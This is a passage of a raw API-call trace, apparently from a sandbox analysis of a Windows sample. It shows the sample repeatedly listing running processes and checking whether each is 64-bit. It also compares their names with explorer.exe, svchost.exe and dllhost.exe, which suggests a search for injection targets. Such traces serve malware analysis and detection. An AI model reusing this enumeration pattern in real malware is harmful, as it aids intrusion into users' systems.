th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0177.859] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0177.860] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0177.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0177.860] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.860] CloseHandle (hObject=0xd8) returned 1 [0177.860] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0177.860] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0177.861] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0177.861] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0177.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0177.861] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0177.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0177.862] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.862] CloseHandle (hObject=0xd8) returned 1 [0177.862] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0177.862] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0177.862] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0177.862] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0177.862] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0177.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0177.863] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0177.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0177.863] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.863] CloseHandle (hObject=0xd8) returned 1 [0177.863] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0177.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0177.864] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.864] CloseHandle (hObject=0xd8) returned 1 [0177.864] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0177.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0177.865] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.865] CloseHandle (hObject=0xd8) returned 1 [0177.865] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0177.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0177.865] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.865] CloseHandle (hObject=0xd8) returned 1 [0177.865] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0177.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0177.866] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.866] CloseHandle (hObject=0xd8) returned 1 [0177.866] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0177.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0177.866] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.867] CloseHandle (hObject=0xd8) returned 1 [0177.867] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0177.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0177.867] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.867] CloseHandle (hObject=0xd8) returned 1 [0177.867] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0177.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0177.868] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.868] CloseHandle (hObject=0xd8) returned 1 [0177.868] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0177.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0177.868] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.868] CloseHandle (hObject=0xd8) returned 1 [0177.868] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0177.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0177.869] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.869] CloseHandle (hObject=0xd8) returned 1 [0177.869] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0177.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0177.869] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.869] CloseHandle (hObject=0xd8) returned 1 [0177.869] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0177.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0177.870] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.870] CloseHandle (hObject=0xd8) returned 1 [0177.870] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0177.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0177.871] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.871] CloseHandle (hObject=0xd8) returned 1 [0177.871] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0177.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0177.871] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.871] CloseHandle (hObject=0xd8) returned 1 [0177.871] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0177.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0177.872] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.872] CloseHandle (hObject=0xd8) returned 1 [0177.872] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0177.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0177.872] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.872] CloseHandle (hObject=0xd8) returned 1 [0177.872] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0177.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0177.873] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.873] CloseHandle (hObject=0xd8) returned 1 [0177.873] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0177.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0177.874] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.874] CloseHandle (hObject=0xd8) returned 1 [0177.874] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0177.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0177.874] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.874] CloseHandle (hObject=0xd8) returned 1 [0177.874] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0177.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0177.875] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.875] CloseHandle (hObject=0xd8) returned 1 [0177.875] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0177.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0177.875] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.875] CloseHandle (hObject=0xd8) returned 1 [0177.875] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0177.876] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0177.876] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0177.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0177.877] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0177.877] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0177.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0177.878] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0177.878] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0177.879] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.879] CloseHandle (hObject=0xd8) returned 1 [0177.879] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0177.879] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0177.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0177.879] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.879] CloseHandle (hObject=0xd8) returned 1 [0177.880] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0177.880] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0177.880] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0177.880] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0177.880] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0177.881] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.881] CloseHandle (hObject=0xd8) returned 1 [0177.881] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0177.881] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.881] CloseHandle (hObject=0xd8) returned 1 [0177.881] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0177.881] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0177.882] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.882] CloseHandle (hObject=0xd8) returned 1 [0177.882] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.882] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0177.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0177.883] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0177.883] CloseHandle (hObject=0xd8) returned 1 [0177.883] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0177.884] CloseHandle (hObject=0xd4) returned 1 [0177.884] Sleep (dwMilliseconds=0x3e8) [0178.894] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0178.896] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0178.897] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0178.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0178.897] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0178.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0178.898] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0178.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0178.898] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0178.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0178.899] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0178.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0178.899] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0178.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0178.900] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0178.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0178.900] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, 